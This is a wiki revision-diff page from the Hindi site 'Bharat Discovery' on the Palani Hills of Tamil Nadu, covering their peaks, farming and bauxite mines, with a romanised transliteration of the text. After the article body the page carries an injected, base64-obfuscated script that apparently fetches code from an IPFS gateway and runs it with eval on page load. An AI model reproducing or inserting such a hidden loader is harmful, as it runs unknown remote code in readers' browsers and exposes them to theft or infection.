Difference between revisions of "पालनी पहाड़ियाँ"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('{{पुनरीक्षण}} *पालनी पर्वत श्रेणी, पश्चिमी घाट का एक पू...' के साथ नया पन्ना बनाया)
 
Line 1: Line 1:
{{पुनरीक्षण}}
+
'''पालनी पर्वत श्रेणी''', पश्चिमी घाट का एक पूर्ववर्ती विस्तार है।  
*पालनी पर्वत श्रेणी, पश्चिमी घाट का एक पूर्ववर्ती विस्तार है।  
 
 
*पालनी पहाड़ियाँ दक्षिण [[भारत]] के दक्षिण-पश्चिम [[तमिलनाडु]] में स्थित है।  
 
*पालनी पहाड़ियाँ दक्षिण [[भारत]] के दक्षिण-पश्चिम [[तमिलनाडु]] में स्थित है।  
*[[केरल]] राज्य में [[अन्नामलाई पहाड़ियाँ|अन्नामलाई पहाड़ियों]] का क्रमिक विस्तार रूप पालनी लगभग 70 किमी चौड़ा और 23 किमी लंबा है।  
+
*[[केरल]] राज्य में [[अन्नामलाई पहाड़ियाँ|अन्नामलाई पहाड़ियों]] का क्रमिक विस्तार रूप पालनी लगभग 70 कि.मी. चौड़ा और 23 कि.मी. लंबा है।  
 
*दक्षिण में पालनी पहाड़ियाँ अचानक तीखे ढाल के रूप में समाप्त हो जाती हैं।
 
*दक्षिण में पालनी पहाड़ियाँ अचानक तीखे ढाल के रूप में समाप्त हो जाती हैं।
 
*पश्चिम में स्थित ऊपरी पालनी घुमावदार पहाड़ियों का क्षेत्र है, जो मोटी घास से ढका हुआ है; घाटियों में घने जंगल पाए जाते हैं।  
 
*पश्चिम में स्थित ऊपरी पालनी घुमावदार पहाड़ियों का क्षेत्र है, जो मोटी घास से ढका हुआ है; घाटियों में घने जंगल पाए जाते हैं।  
 
*इसकी चोटियों में वंडारावु 2,553 मीटर, वेंबाडी शोला 2,505 मीटर; और क्रुमांकाडी 2,451 मीटर शामिल हैं।  
 
*इसकी चोटियों में वंडारावु 2,553 मीटर, वेंबाडी शोला 2,505 मीटर; और क्रुमांकाडी 2,451 मीटर शामिल हैं।  
*पालनी पहाड़ियो पर बसे गांवों में [[शाक-सब्ज़ी|सब्ज़ियों]] और [[फल|फलों]] की खेती होती है, जिनमें [[आलू]], फलियां कंद वाली फ़सलें नाशपाती और आडू शामिल हैं। पालनी में बॉक्साइट की खानें भी हैं।
+
*पालनी पहाड़ियों पर बसे गांवों में [[शाक-सब्ज़ी|सब्ज़ियों]] और [[फल|फलों]] की खेती होती है, जिनमें [[आलू]], फलियां कंद वाली फ़सलें नाशपाती और आडू शामिल हैं। पालनी में बॉक्साइट की खानें भी हैं।
 
*पूर्व में निम्न पालनी औसतन 900-1,500 मीटर भ्रमित कर देने वाली ऊँची चोटियों का अव्यवस्थित समूह है, जो गहरी वनाच्छादित घाटियों से विभक्त हैं।  
 
*पूर्व में निम्न पालनी औसतन 900-1,500 मीटर भ्रमित कर देने वाली ऊँची चोटियों का अव्यवस्थित समूह है, जो गहरी वनाच्छादित घाटियों से विभक्त हैं।  
 
*सागौन के वृक्ष भी व्यापक पैमाने पर लगाए गए हैं।  
 
*सागौन के वृक्ष भी व्यापक पैमाने पर लगाए गए हैं।  
Line 22: Line 21:
 
[[Category:पर्वत]]
 
[[Category:पर्वत]]
 
[[Category:भूगोल कोश]]
 
[[Category:भूगोल कोश]]
[[Category:नया पन्ना सितंबर-2011]]
+
 
  
 
__INDEX__
 
__INDEX__

Revision as of 11:52, 10 October 2011

palani parvat shreni, pashchimi ghat ka ek poorvavarti vistar hai.

  • palani paha diyaan dakshin bharat ke dakshin-pashchim tamilanadu mean sthit hai.
  • keral rajy mean annamalaee paha diyoan ka kramik vistar roop palani lagabhag 70 ki.mi. chau da aur 23 ki.mi. lanba hai.
  • dakshin mean palani paha diyaan achanak tikhe dhal ke roop mean samapt ho jati haian.
  • pashchim mean sthit oopari palani ghumavadar paha diyoan ka kshetr hai, jo moti ghas se dhaka hua hai; ghatiyoan mean ghane jangal pae jate haian.
  • isaki chotiyoan mean vandaravu 2,553 mitar, veanbadi shola 2,505 mitar; aur krumaankadi 2,451 mitar shamil haian.
  • palani paha diyoan par base gaanvoan mean sabziyoan aur phaloan ki kheti hoti hai, jinamean aloo, phaliyaan kand vali fasalean nashapati aur adoo shamil haian. palani mean b aauksait ki khanean bhi haian.
  • poorv mean nimn palani ausatan 900-1,500 mitar bhramit kar dene vali ooanchi chotiyoan ka avyavasthit samooh hai, jo gahari vanachchhadit ghatiyoan se vibhakt haian.
  • sagaun ke vriksh bhi vyapak paimane par lagae ge haian.
  • mahattvapoorn naqadi fasaloan mean k aaufi, kela, ilayachi, niboo prajati ke phal aur haldi shamil haian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh